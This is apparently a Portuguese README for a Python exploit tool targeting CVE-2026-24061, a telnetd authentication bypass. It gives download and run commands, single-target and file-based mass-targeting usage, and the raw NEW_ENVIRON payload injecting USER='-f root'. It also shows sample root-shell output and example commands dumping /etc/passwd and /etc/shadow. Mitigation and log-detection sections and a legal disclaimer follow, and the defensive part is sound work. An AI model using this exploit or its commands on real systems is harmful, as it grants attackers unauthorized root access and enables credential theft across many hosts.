
Prova de Conceito: CVE-2026-24061 é uma vulnerabilidade crítica de bypass de autenticação no GNU inetutils-telnetd que permite que atacantes remotos não autenticados obtenham acesso instantâneo a um shell root via exploração maliciosa da opção telnet NEW_ENVIRON.
Uma ferramenta de pesquisa de segurança para explorar a CVE-2026-24061, uma vulnerabilidade crítica de bypass de autenticação remota no GNU inetutils-telnetd que permite acesso instantâneo a shell root sem autenticação.
| Campo | Valor |
|---|---|
| Identificador CVE | CVE-2026-24061 |
| Pontuação CVSS v3.1 | 9.8 (Crítica) |
| Vetor CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Classificação CWE | CWE-88: Neutralização Incorreta de Delimitadores de Argumento em um Comando |
| Fornecedor | GNU Project |
| Produto | inetutils-telnetd |
| Data de Divulgação | 20 de janeiro de 2026 |
| Patch Disponível | TBD |
Existe uma vulnerabilidade crítica no GNU inetutils-telnetd até a versão 2.7 que permite que atacantes remotos não autenticados ignorem totalmente a autenticação e obtenham acesso imediato a shell root. A vulnerabilidade é explorada por meio da opção telnet NEW_ENVIRON, injetando uma variável de ambiente USER especialmente elaborada com o valor "-f root", que contorna todos os mecanismos de autenticação.
| Faixa de Versões | Status |
|---|---|
| <= 2.7 | Vulnerável |
| > 2.7 | Status do Patch TBD |
A vulnerabilidade origina-se da validação incorreta da variável de ambiente USER no manipulador da opção NEW_ENVIRON do telnetd. Ao processar a opção telnet NEW_ENVIRON, o serviço telnetd não sanitiza o valor da variável USER antes de passá-lo ao processo de login. Ao definir USER como "-f root", o atacante injeta argumentos de linha de comando que forçam a autenticação a ser bem-sucedida para o usuário root sem exigir credenciais.
Todas as dependências fazem parte da biblioteca padrão do Python:
# Clone the repository
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061
# Run the exploit
python3 main.py -u <target_ip>
# Download the exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py
# Make it executable (Linux/macOS)
chmod +x main.py
# Run the exploit
python3 main.py -u <target_ip>
# Ensure Python 3.7+ is installed
python3 --version
# Download and run
python3 main.py -u <target_ip>
Usage:
python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
echo "commands" | python3 main.py -u <target_ip>
Arguments:
-u Single target IP address or hostname
-l Path to file containing target IPs (one per line)
-p Target port (default: 23)
-usr User to exploit as (default: root)
Explore uma única instância telnetd:
# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100
# Custom port
python3 main.py -u 192.168.1.100 -p 2323
# Different user
python3 main.py -u 192.168.1.100 -usr admin
Execute comandos de forma não interativa:
# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100
# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100
# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100
Explore vários alvos a partir de um arquivo:
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin
Formato do Arquivo de Alvos (targets.txt):
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com
Notas:
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass ║
║ ║
║ CVSS Score: 9.8 (Critical) ║
║ Impact: Remote Authentication Bypass - Instant Root Shell ║
║ ║
║ This tool is part of the HGrab Framework. ║
╚═══════════════════════════════════════════════════════════════╝
[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
O exploit aproveita a fase de negociação do protocolo telnet:
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39
payload = bytes([
255, # IAC
250, # SB
39, # NEW_ENVIRON
0, # IS
0, # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
255, # IAC
240 # SE
])
select.select() para monitoramento simultâneo de socket e stdinDesative o telnetd: Pare e desative o serviço telnetd imediatamente
# systemd-based systems
sudo systemctl stop telnetd
sudo systemctl disable telnetd
# xinetd-based systems
sudo service xinetd stop
sudo chkconfig telnet off
Regras de Firewall: Bloqueie a porta telnet (23) no nível do firewall
# iptables
sudo iptables -A INPUT -p tcp --dport 23 -j DROP
# firewalld
sudo firewall-cmd --permanent --remove-service=telnet
sudo firewall-cmd --reload
Isolamento de Rede: Remova o serviço telnet de sistemas expostos à internet
Use SSH em vez de Telnet:
# Install OpenSSH server
sudo apt-get install openssh-server # Debian/Ubuntu
sudo yum install openssh-server # RHEL/CentOS
# Enable and start SSH
sudo systemctl enable sshd
sudo systemctl start sshd
# Verify telnetd is not running
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23
# Should return no results if properly disabled
Revise os logs do sistema procurando os seguintes padrões:
Logs de Autenticação:
# Check for unusual login patterns
sudo grep telnetd /var/log/auth.log
sudo grep telnetd /var/log/secure
# Look for suspicious USER environment variables
sudo grep "USER.*-f" /var/log/auth.log
Logs de Rede:
# Check for active telnet connections
sudo netstat -antp | grep :23
# Review recent root logins
sudo last | grep root
# Check for modified system files
sudo rpm -Va # RHEL/CentOS
sudo debsums -c # Debian/Ubuntu
# List processes by root
sudo ps aux | grep root
# Check for unauthorized SSH keys
sudo cat /root/.ssh/authorized_keys
IMPORTANTE: LEIA ANTES DE USAR
Esta ferramenta é fornecida estritamente para:
Usos Proibidos:
Responsabilidade: Os autores, colaboradores e distribuidores deste software NÃO assumem qualquer responsabilidade ou obrigação por uso indevido, danos ou atividades ilegais realizadas com esta ferramenta. Os usuários são os únicos responsáveis por:
Aviso Jurídico: O acesso não autorizado a sistemas de computador é uma infração penal grave. Violações podem resultar em processo judicial sob:
As penalidades podem incluir prisão, multas substanciais e responsabilidade civil.
Ao usar esta ferramenta, você reconhece que leu, entendeu e concorda em cumprir este aviso e todas as leis aplicáveis.
| Versão | Data | Alterações |
|---|---|---|
| 1.0.0 | 2026-01-23 | Lançamento inicial |
Para perguntas, problemas ou contribuições:
Este projeto é fornecido como está, apenas para pesquisa de segurança autorizada e fins educacionais. Nenhuma garantia é fornecida, expressa ou implícita. Use por sua conta e risco e em conformidade com todas as leis e regulamentos aplicáveis.
USE SOMENTE COM AUTORIZAÇÃO ADEQUADA
| Pacote | Finalidade |
|---|
| socket | Comunicação de rede |
| select | Multiplexação de E/S |
| sys | Interação com o sistema |
| os | Interface com o sistema operacional |
| threading | Exploração concorrente de alvos |
| datetime | Formatação de carimbos de data/hora |
| Indicador | Cor | Descrição |
|---|
[SUCCESS] | Verde | Conectado ao alvo com sucesso |
[EXPLOIT] | Verde | Payload de exploração enviado com sucesso |
[INFO] | Azul | Mensagem informativa sobre a operação atual |
[ERROR] | Vermelho | Falha de conexão, timeout ou erro de exploração |
[WARNING] | Amarelo | Mensagem de aviso (atualmente não utilizada) |
| Ação | Prioridade | Descrição |
|---|
| Migração para SSH | Crítica | Substitua o telnet por SSH para acesso remoto |
| Gerenciamento de Patches | Crítica | Monitore e aplique atualizações de segurança |
| Auditoria de Serviços | Alta | Identifique e desative serviços de rede desnecessários |
| Segmentação de Rede | Alta | Isole sistemas críticos de redes públicas |
| Detecção de Intrusão | Média | Implante IDS/IPS para detectar tentativas de exploração |
| Controle de Acesso | Média | Implemente lista de permissões de IP para serviços remotos |